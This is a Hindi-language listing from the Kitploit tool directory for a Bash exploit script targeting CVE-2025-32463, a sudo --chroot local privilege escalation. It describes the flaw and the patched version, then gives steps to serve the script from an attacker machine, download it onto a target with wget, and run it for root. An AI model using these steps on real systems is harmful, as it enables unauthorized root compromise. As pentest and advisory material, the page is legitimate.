Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463 — # CVE-2025-32463 के लिए Bash शोषण स्क्रिप्ट Sudo 1.9.17 में chroot विकल्प के माध्यम से स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता, जो प्रभावित सिस्टम पर रूट एक्सेस सक्षम करती है। | Kitploit
उपकरण/GitHubGitHub/justjoeyking/cve-2025-32463
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

# CVE-2025-32463 के लिए Bash शोषण स्क्रिप्ट Sudo 1.9.17 में chroot विकल्प के माध्यम से स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता, जो प्रभावित सिस्टम पर रूट एक्सेस सक्षम करती है।

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Sudo संस्करण 1.9.17 में एक गंभीर कमजोरी (CVE-2025-32463) है जो स्थानीय उपयोगकर्ताओं को chroot विकल्प का शोषण करके रूट एक्सेस प्राप्त करने की अनुमति देती है, जिससे गंभीर सुरक्षा जोखिम पैदा हो सकते हैं। उपयोगकर्ताओं को सलाह दी जाती है कि वे इस समस्या को कम करने के लिए संस्करण 1.9.17p1 या उसके बाद के संस्करण में अपडेट करें।

Sudo 1.9.17 कमजोरी का अवलोकन:-

Sudo संस्करण 1.9.17 में कमजोरी, जिसे CVE-2025-32463 के रूप में पहचाना गया है, एक गंभीर दोष है जो स्थानीय उपयोगकर्ताओं को रूट एक्सेस प्राप्त करने की अनुमति देता है। यह समस्या इस बदलाव के कारण उत्पन्न होती है कि Sudo --chroot (-R) विकल्प को कैसे संभालता है, जो प्रक्रियाओं की रूट डायरेक्टरी बदलकर उन्हें अलग करने के लिए अभिप्रेत है।

कमजोरी कैसे काम करती है:-

पथ समाधान समस्या: संस्करण 1.9.14 से 1.9.17 में, Sudo उपयोगकर्ता अनुमतियों की जाँच करने से पहले --chroot विकल्प का मूल्यांकन करता है। यह हमलावरों को पर्यावरण को नियंत्रित करने और दुर्भावनापूर्ण लाइब्रेरी लोड करने की अनुमति देता है।

शोषण के चरण:

एक हमलावर अपने नियंत्रण वाली डायरेक्टरी में एक दुर्भावनापूर्ण nsswitch.conf फ़ाइल बनाता है। वे -R विकल्प के साथ Sudo निष्पादित करते हैं, जिससे Sudo हमलावर का कॉन्फ़िगरेशन और लाइब्रेरी लोड करता है, और रूट एक्सेस प्रदान करता है।

मैंने "cwoot.sh" नामक एक bash स्क्रिप्ट बनाई है जो निष्पादन के बाद सीधे रूट उपयोगकर्ता में बदल जाएगी।

निम्नलिखित करें:

स्क्रिप्ट को रिपॉजिटरी से डाउनलोड करें: git clone https://github.com/justjoeyking/CVE-2025-32463.git

अपनी मशीन में : python3 -m http.server 8080

लक्ष्य मशीन में : wget http://<own_IP_address>:8080/cwoot.sh

लक्ष्य मशीन में : chmod 755 cwoot.sh

लक्ष्य मशीन में स्क्रिप्ट चलाएँ : ./cwoot.sh

टूल डाउनलोड करें